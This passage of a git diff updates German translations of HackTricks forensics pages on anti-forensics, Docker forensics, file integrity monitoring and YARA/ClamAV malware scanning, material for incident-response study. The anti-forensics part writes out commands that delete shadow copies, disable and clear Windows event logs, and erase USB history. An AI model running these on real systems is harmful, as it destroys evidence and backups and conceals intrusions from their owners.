NTFS-Volume kann dies die Leistung beeinträchtigen. +Immer wenn ein Ordner von einem NTFS-Volume auf einem Windows NT-Server geöffnet wird, nimmt sich das System Zeit, **ein Zeitstempelfeld auf jedem aufgelisteten Ordner zu aktualisieren**, genannt der letzte Zugriffszeitpunkt. Auf einem stark genutzten NTFS-Volume kann dies die Leistung beeinträchtigen. 1. Öffnen Sie den Registrierungseditor (Regedit.exe). 2. Navigieren Sie zu `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem`. @@ -123,22 +123,22 @@ Immer wenn ein Ordner von einem NTFS-Volume auf einem Windows NT-Server geöffne 4. Schließen Sie den Registrierungseditor und starten Sie den Server neu. ## Löschen des USB-Verlaufs -Alle **USB-Geräteeinträge** werden im Windows-Registrierungsschlüssel **USBSTOR** gespeichert, der Unterkeys enthält, die jedes Mal erstellt werden, wenn Sie ein USB-Gerät in Ihren PC oder Laptop stecken. Sie finden diesen Schlüssel hier H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Durch das Löschen** dieses Schlüssels wird der USB-Verlauf gelöscht.\ +Alle **USB-Geräteeinträge** werden im Windows-Registrierungsschlüssel **USBSTOR** gespeichert, der Unterordnungen enthält, die jedes Mal erstellt werden, wenn Sie ein USB-Gerät in Ihren PC oder Laptop stecken. Sie finden diesen Schlüssel hier H`KEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR`. **Durch das Löschen** dieses Schlüssels wird der USB-Verlauf gelöscht.\ Sie können auch das Tool [**USBDeview**](https://www.nirsoft.net/utils/usb\_devices\_view.html) verwenden, um sicherzustellen, dass Sie sie gelöscht haben (und um sie zu löschen). -Eine weitere Datei, die Informationen über die USBs speichert, ist die Datei `setupapi.dev.log` im Ordner `C:\Windows\INF`. Diese sollte ebenfalls gelöscht werden. +Eine weitere Datei, die Informationen über die USB-Geräte speichert, ist die Datei `setupapi.dev.log` im Ordner `C:\Windows\INF`. Diese sollte ebenfalls gelöscht werden. ## Deaktivieren von Schattenkopien **Liste** Schattenkopien mit `vssadmin list shadowstorage`\ **Löschen** Sie sie, indem Sie `vssadmin delete shadow` ausführen -Sie können sie auch über die GUI löschen, indem Sie den Anweisungen unter [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html) folgen. +Sie können sie auch über die GUI löschen, indem Sie den in [https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html](https://www.ubackup.com/windows-10/how-to-delete-shadow-copies-windows-10-5740.html) vorgeschlagenen Schritten folgen. Um Schattenkopien zu deaktivieren [Schritte von hier](https://support.waters.com/KB_Inf/Other/WKB15560_How_to_disable_Volume_Shadow_Copy_Service_VSS_in_Windows): 1. Öffnen Sie das Dienstprogramm "Dienste", indem Sie nach dem Klicken auf die Windows-Startschaltfläche "Dienste" in das Textsuchfeld eingeben. -2. Suchen Sie "Volume Shadow Copy" in der Liste, wählen Sie es aus und greifen Sie dann durch einen Rechtsklick auf Eigenschaften zu. +2. Suchen Sie aus der Liste "Volume Shadow Copy", wählen Sie es aus und greifen Sie dann durch einen Rechtsklick auf Eigenschaften zu. 3. Wählen Sie "Deaktiviert" aus dem Dropdown-Menü "Starttyp" und bestätigen Sie die Änderung, indem Sie auf Übernehmen und OK klicken. Es ist auch möglich, die Konfiguration zu ändern, welche Dateien im Schattenkopie im Registrierungsschlüssel `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` kopiert werden sollen. @@ -157,7 +157,7 @@ Es ist auch möglich, die Konfiguration zu ändern, welche Dateien im Schattenko ## Deaktivieren von Windows-Ereignisprotokollen * `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f` -* Deaktivieren Sie den Dienst "Windows-Ereignisprotokoll" im Dienstabschnitt +* Deaktivieren Sie im Dienstabschnitt den Dienst "Windows-Ereignisprotokoll" * `WEvtUtil.exec clear-log` oder `WEvtUtil.exe cl` ## Deaktivieren von $UsnJrnl @@ -169,16 +169,17 @@ Es ist auch möglich, die Konfiguration zu ändern, welche Dateien im Schattenko {% embed url="https://websec.nl/" %} +{% hint style="success" %} +Lernen Sie & üben Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Erlernen Sie AWS-Hacking von Null auf Held mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks beworben sehen möchten** oder **HackTricks im PDF-Format herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merch**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories einreichen. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys einreichen.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/docker-forensics.md b/forensics/basic-forensic-methodology/docker-forensics.md index 8b01b1b05..c39e9e25d 100644 --- a/forensics/basic-forensic-methodology/docker-forensics.md +++ b/forensics/basic-forensic-methodology/docker-forensics.md @@ -1,18 +1,19 @@ # Docker-Forensik +{% hint style="success" %} +Lernen Sie und üben Sie AWS-Hacking: [**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie und üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories senden. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories senden.
+{% endhint %} ## Container-Modifikation @@ -22,7 +23,7 @@ docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES cc03e43a052a lamp-wordpress "./run.sh" 2 minutes ago Up 2 minutes 80/tcp wordpress ``` -Sie können die Änderungen, die an diesem Container im Vergleich zum Image vorgenommen wurden, leicht mit folgendem Befehl finden: +Sie können ganz einfach **die Änderungen finden, die an diesem Container im Vergleich zum Image vorgenommen wurden** mit: ```bash docker diff wordpress C /var @@ -36,8 +37,8 @@ A /var/lib/mysql/mysql/time_zone_leap_second.MYI A /var/lib/mysql/mysql/general_log.CSV ... ``` -Im vorherigen Befehl bedeutet **C** "Geändert" und **A** "Hinzugefügt".\ -Wenn Sie feststellen, dass eine interessante Datei wie `/etc/shadow` geändert wurde, können Sie sie aus dem Container herunterladen, um nach bösartigen Aktivitäten zu suchen: +Im vorherigen Befehl bedeutet **C** **Geändert** und **A,** **Hinzugefügt**.\ +Wenn Sie feststellen, dass eine interessante Datei wie z. B. `/etc/shadow` geändert wurde, können Sie sie aus dem Container herunterladen, um auf bösartige Aktivitäten zu überprüfen: ```bash docker cp wordpress:/etc/shadow. ``` @@ -47,26 +48,26 @@ docker run -d lamp-wordpress docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container diff original_shadow shadow ``` -Wenn Sie feststellen, dass **eine verdächtige Datei hinzugefügt wurde**, können Sie auf den Container zugreifen und sie überprüfen: +Wenn Sie feststellen, dass **eine verdächtige Datei hinzugefügt wurde**, können Sie auf den Container zugreifen und diese überprüfen: ```bash docker exec -it wordpress bash ``` ## Bildmodifikationen -Wenn Ihnen ein exportiertes Docker-Image (wahrscheinlich im `.tar`-Format) zur Verfügung gestellt wird, können Sie [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) verwenden, um **eine Zusammenfassung der Modifikationen** zu extrahieren: +Wenn Ihnen ein exportiertes Docker-Image (wahrscheinlich im `.tar`-Format) zur Verfügung steht, können Sie [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) verwenden, um **eine Zusammenfassung der Modifikationen** zu extrahieren: ```bash docker save > image.tar #Export the image to a .tar file container-diff analyze -t sizelayer image.tar container-diff analyze -t history image.tar container-diff analyze -t metadata image.tar ``` -Dann können Sie das Bild **dekomprimieren** und auf die **Blobs zugreifen**, um nach verdächtigen Dateien zu suchen, die Sie möglicherweise in der Änderungshistorie gefunden haben: +Dann kannst du das Bild **dekomprimieren** und auf die **Blobs zugreifen**, um nach verdächtigen Dateien zu suchen, die du im Änderungsverlauf gefunden haben könntest: ```bash tar -xf image.tar ``` ### Grundlegende Analyse -Sie können grundlegende Informationen aus dem ausgeführten Image erhalten: +Sie können **grundlegende Informationen** aus dem ausgeführten Image erhalten: ```bash docker inspect ``` @@ -79,9 +80,9 @@ Sie können auch ein **Dockerfile aus einem Image generieren** mit: alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage" dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers> ``` -### Dive +### Tauchen -Um hinzugefügte/geänderte Dateien in Docker-Images zu finden, können Sie auch das [**dive**](https://github.com/wagoodman/dive) (laden Sie es von [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0) herunter) Dienstprogramm verwenden: +Um hinzugefügte/geänderte Dateien in Docker-Images zu finden, können Sie auch das [**dive**](https://github.com/wagoodman/dive) (laden Sie es von [**Releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) Dienstprogramm verwenden: ```bash #First you need to load the image in your docker repo sudo docker load < image.tar 1 ⨯ @@ -90,30 +91,16 @@ Loaded image: flask:latest #And then open it with dive: sudo dive flask:latest ``` -Dies ermöglicht es Ihnen, **durch die verschiedenen Blöcke von Docker-Images zu navigieren** und zu überprüfen, welche Dateien geändert/hinzugefügt wurden. **Rot** bedeutet hinzugefügt und **gelb** bedeutet geändert. Verwenden Sie **Tab**, um zur anderen Ansicht zu wechseln, und **Leertaste**, um Ordner zu öffnen/schließen. +Dies ermöglicht es Ihnen, **durch die verschiedenen Blöcke von Docker-Images zu navigieren** und zu überprüfen, welche Dateien geändert/hinzugefügt wurden. **Rot** bedeutet hinzugefügt und **gelb** bedeutet geändert. Verwenden Sie die **Tab**-Taste, um zur anderen Ansicht zu wechseln, und die **Leertaste**, um Ordner zu öffnen/schließen. -Mit `die` können Sie nicht auf den Inhalt der verschiedenen Stufen des Images zugreifen. Um dies zu tun, müssen Sie **jede Schicht dekomprimieren und darauf zugreifen**.\ -Sie können alle Schichten eines Images aus dem Verzeichnis, in dem das Image dekomprimiert wurde, dekomprimieren, indem Sie Folgendes ausführen: +Damit können Sie nicht auf den Inhalt der verschiedenen Stufen des Images zugreifen. Um dies zu tun, müssen Sie **jede Schicht dekomprimieren und darauf zugreifen**.\ +Sie können alle Schichten eines Images aus dem Verzeichnis, in dem das Image dekomprimiert wurde, dekomprimieren, indem Sie ausführen: ```bash tar -xf image.tar for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done ``` ## Anmeldeinformationen aus dem Speicher -Beachten Sie, dass Sie, wenn Sie einen Docker-Container in einem Host ausführen, **die auf dem Container ausgeführten Prozesse vom Host aus sehen können**, indem Sie einfach `ps -ef` ausführen. +Beachten Sie, dass wenn Sie einen Docker-Container innerhalb eines Hosts ausführen, **können Sie die Prozesse, die im Container ausgeführt werden, vom Host aus sehen**, indem Sie einfach `ps -ef` ausführen. Daher können Sie (als Root) den Speicher der Prozesse vom Host aus **dumpen** und nach **Anmeldeinformationen** suchen, genau [**wie im folgenden Beispiel**](../../linux-hardening/privilege-escalation/#process-memory). - -
- -Erlernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! - -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories senden. - -
diff --git a/forensics/basic-forensic-methodology/file-integrity-monitoring.md b/forensics/basic-forensic-methodology/file-integrity-monitoring.md index 2e81ce936..bc5ec5c51 100644 --- a/forensics/basic-forensic-methodology/file-integrity-monitoring.md +++ b/forensics/basic-forensic-methodology/file-integrity-monitoring.md @@ -1,31 +1,32 @@ +{% hint style="success" %} +Lernen & üben Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs zu den** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories einreichen. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} -# Grundlinie +# Baseline -Eine Grundlinie besteht darin, einen Schnappschuss bestimmter Teile eines Systems zu erstellen, um ihn mit einem zukünftigen Status zu vergleichen und Änderungen hervorzuheben. +Eine Baseline besteht darin, einen Schnappschuss bestimmter Teile eines Systems zu machen, um **ihn mit einem zukünftigen Status zu vergleichen und Änderungen hervorzuheben**. -Sie können beispielsweise den Hash-Wert jeder Datei des Dateisystems berechnen und speichern, um herauszufinden, welche Dateien geändert wurden.\ -Dies kann auch mit den erstellten Benutzerkonten, laufenden Prozessen, laufenden Diensten und allem anderen, das sich nicht viel oder gar nicht ändern sollte, durchgeführt werden. +Zum Beispiel können Sie den Hash-Wert jeder Datei des Dateisystems berechnen und speichern, um herauszufinden, welche Dateien geändert wurden.\ +Dies kann auch mit den erstellten Benutzerkonten, laufenden Prozessen, laufenden Diensten und allem anderen gemacht werden, was sich nicht oder kaum ändern sollte. -## Dateiintegritätsüberwachung +## Datei-Integritätsüberwachung -Die Dateiintegritätsüberwachung (File Integrity Monitoring, FIM) ist eine wichtige Sicherheitstechnik, die IT-Umgebungen und Daten durch die Verfolgung von Änderungen in Dateien schützt. Sie umfasst zwei wesentliche Schritte: +Die Datei-Integritätsüberwachung (FIM) ist eine kritische Sicherheitstechnik, die IT-Umgebungen und Daten schützt, indem Änderungen an Dateien verfolgt werden. Sie umfasst zwei wesentliche Schritte: -1. **Vergleich der Grundlinie:** Erstellen Sie eine Grundlinie mithilfe von Dateiattributen oder kryptografischen Prüfsummen (wie MD5 oder SHA-2) für zukünftige Vergleiche, um Modifikationen zu erkennen. -2. **Benachrichtigung über Echtzeitänderungen:** Erhalten Sie sofortige Benachrichtigungen, wenn Dateien aufgerufen oder geändert werden, in der Regel über Betriebssystem-Kernel-Erweiterungen. +1. **Vergleich der Baseline:** Eine Baseline anhand von Dateiattributen oder kryptografischen Prüfsummen (wie MD5 oder SHA-2) erstellen, um zukünftige Vergleiche zur Erkennung von Änderungen durchzuführen. +2. **Benachrichtigung über Echtzeitänderungen:** Sofortige Benachrichtigungen erhalten, wenn auf Dateien zugegriffen oder sie geändert werden, in der Regel über OS-Kernelerweiterungen. ## Tools @@ -37,16 +38,17 @@ Die Dateiintegritätsüberwachung (File Integrity Monitoring, FIM) ist eine wich * [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it) +{% hint style="success" %} +Lernen & üben Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen & üben Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs zu den** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-Repositories einreichen. +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositorys senden.
+{% endhint %} diff --git a/forensics/basic-forensic-methodology/malware-analysis.md b/forensics/basic-forensic-methodology/malware-analysis.md index bc490a60f..6b1aa5898 100644 --- a/forensics/basic-forensic-methodology/malware-analysis.md +++ b/forensics/basic-forensic-methodology/malware-analysis.md @@ -1,18 +1,19 @@ # Malware-Analyse +{% hint style="success" %} +Lernen Sie AWS-Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Lernen Sie GCP-Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +
-Lernen Sie AWS-Hacking von Grund auf mit htARTE (HackTricks AWS Red Team Expert)! +Unterstützen Sie HackTricks -Andere Möglichkeiten, HackTricks zu unterstützen: - -* Wenn Sie Ihr **Unternehmen in HackTricks bewerben möchten** oder **HackTricks als PDF herunterladen möchten**, überprüfen Sie die [**ABONNEMENTPLÄNE**](https://github.com/sponsors/carlospolop)! -* Holen Sie sich das [**offizielle PEASS & HackTricks-Merchandise**](https://peass.creator-spring.com) -* Entdecken Sie [**The PEASS Family**](https://opensea.io/collection/the-peass-family), unsere Sammlung exklusiver [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) **bei oder folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Teilen Sie Ihre Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) **und** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **GitHub-Repositories senden.** +* Überprüfen Sie die [**Abonnementpläne**](https://github.com/sponsors/carlospolop)! +* **Treten Sie der** 💬 [**Discord-Gruppe**](https://discord.gg/hRep4RUj7f) oder der [**Telegram-Gruppe**](https://t.me/peass) bei oder **folgen** Sie uns auf **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Teilen Sie Hacking-Tricks, indem Sie PRs an die** [**HackTricks**](https://github.com/carlospolop/hacktricks) und [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) Github-Repositories einreichen.
+{% endhint %} ## Forensik-Spickzettel @@ -30,51 +31,27 @@ Andere Möglichkeiten, HackTricks zu unterstützen: ### Yara -#### Installation +#### Installieren ```bash sudo apt-get install -y yara ``` -#### Vorbereitung der Regeln +#### Vorbereitung von Regeln -Verwenden Sie dieses Skript, um alle YARA-Malware-Regeln von GitHub herunterzuladen und zusammenzuführen: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ -Erstellen Sie das Verzeichnis _**rules**_ und führen Sie es aus. Dadurch wird eine Datei namens _**malware\_rules.yar**_ erstellt, die alle YARA-Regeln für Malware enthält. +Verwenden Sie dieses Skript, um alle Yara-Malware-Regeln von GitHub herunterzuladen und zusammenzuführen: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ +Erstellen Sie das Verzeichnis _**rules**_ und führen Sie es aus. Dadurch wird eine Datei namens _**malware\_rules.yar**_ erstellt, die alle Yara-Regeln für Malware enthält. ```bash wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py mkdir rules python malware_yara_rules.py ``` #### Scannen - -```markdown -The first step in malware analysis is to scan the suspicious file or program. This can be done using various tools and techniques. The purpose of scanning is to identify any known malware signatures or indicators of compromise (IOCs) that may be present in the file. - -Some popular scanning tools include antivirus software, sandboxing tools, and static analysis tools. These tools can help detect and analyze the behavior of the file, identify any malicious code or behavior, and provide information about the file's structure and functionality. - -During the scanning process, it is important to compare the file against a database of known malware signatures and IOCs. This can help determine if the file is a known malware variant or if it exhibits any suspicious behavior that may indicate the presence of malware. - -Additionally, scanning can also help identify any potential vulnerabilities or weaknesses in the file that could be exploited by attackers. This information can be useful in understanding how the malware operates and how it can be mitigated or prevented. - -Overall, scanning is an essential step in malware analysis as it helps identify and understand the nature of the suspicious file or program. It provides valuable insights into the file's behavior, structure, and potential risks, allowing for effective mitigation and prevention strategies. -``` - -```html -Der erste Schritt bei der Malware-Analyse besteht darin, die verdächtige Datei oder das verdächtige Programm zu scannen. Dies kann mit verschiedenen Tools und Techniken durchgeführt werden. Der Zweck des Scannens besteht darin, bekannte Malware-Signaturen oder Indikatoren für Kompromittierungen (IOCs) zu identifizieren, die in der Datei vorhanden sein können. - -Einige beliebte Scanning-Tools sind Antivirensoftware, Sandbox-Tools und statische Analyse-Tools. Diese Tools können dabei helfen, das Verhalten der Datei zu erkennen und zu analysieren, bösartigen Code oder Verhalten zu identifizieren und Informationen über die Struktur und Funktionalität der Datei bereitzustellen. - -Während des Scannens ist es wichtig, die Datei mit einer Datenbank bekannter Malware-Signaturen und IOCs zu vergleichen. Dies kann dabei helfen festzustellen, ob die Datei eine bekannte Malware-Variante ist oder ob sie ein verdächtiges Verhalten aufweist, das auf das Vorhandensein von Malware hinweisen könnte. - -Darüber hinaus kann das Scannen auch dabei helfen, potenzielle Schwachstellen oder Schwachstellen in der Datei zu identifizieren, die von Angreifern ausgenutzt werden könnten. Diese Informationen können dabei helfen, zu verstehen, wie die Malware funktioniert und wie sie gemildert oder verhindert werden kann. - -Insgesamt ist das Scannen ein wesentlicher Schritt bei der Malware-Analyse, da es dabei hilft, die Natur der verdächtigen Datei oder des verdächtigen Programms zu identifizieren und zu verstehen. Es liefert wertvolle Einblicke in das Verhalten, die Struktur und potenzielle Risiken der Datei und ermöglicht effektive Strategien zur Minderung und Prävention. -``` ```bash yara -w malware_rules.yar image #Scan 1 file yara -w malware_rules.yar folder #Scan the whole folder ``` -#### YaraGen: Überprüfen Sie auf Malware und erstellen Sie Regeln +#### YaraGen: Überprüfen von Malware und Erstellen von Regeln -Sie können das Tool [**YaraGen**](https://github.com/Neo23x0/yarGen) verwenden, um Yara-Regeln aus einer Binärdatei zu generieren. Schauen Sie sich diese Tutorials an: [**Teil 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Teil 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Teil 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/) +Sie können das Tool [**YaraGen**](https://github.com/Neo23x0/yarGen) verwenden, um Yara-Regeln aus einem Binärfile zu generieren. Schauen Sie sich diese Tutorials an: [**Teil 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Teil 2**](https://www.nextron-systems.com/2015/10/17/how-to-write-simple-but-sound-yara-rules-part-2/), [**Teil 3**](https://www.nextron-systems.com/2016/04/15/how-to-write-simple-but-sound-yara-rules-part-3/) ```bash python3 yarGen.py --update python3.exe yarGen.py --excludegood -m ../../mals/ @@ -82,78 +59,10 @@ python3.exe yarGen.py --excludegood -m ../../mals/ ### ClamAV #### Installation - -To install ClamAV, follow these steps: - -1. Update the package list: - - ```bash - sudo apt update - ``` - -2. Install ClamAV: - - ```bash - sudo apt install clamav - ``` - -3. Update the virus database: - - ```bash - sudo freshclam - ``` - -4. Verify the installation: - - ```bash - clamscan --version - ``` - - The output should display the ClamAV version. - -#### Scanning Files - -To scan a file or directory with ClamAV, use the following command: - -```bash -clamscan [options] [file/directory] -``` - -Replace `[options]` with any desired scanning options and `[file/directory]` with the path to the file or directory you want to scan. - 